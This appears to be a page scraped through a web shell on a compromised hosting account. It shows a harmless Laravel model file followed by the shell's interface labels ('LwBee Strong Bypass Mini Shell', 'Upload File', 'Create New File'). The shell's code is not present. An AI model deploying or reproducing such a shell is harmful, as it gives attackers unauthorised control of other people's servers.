/home/storage/f/3f/a5/aloic1/public_html/core/app/Models/WebmasterBanner.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class WebmasterBanner extends Model
{
    use HasFactory;

    public function banners()
    {
        return $this->hasMany('App\Models\Banner', 'section_id');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File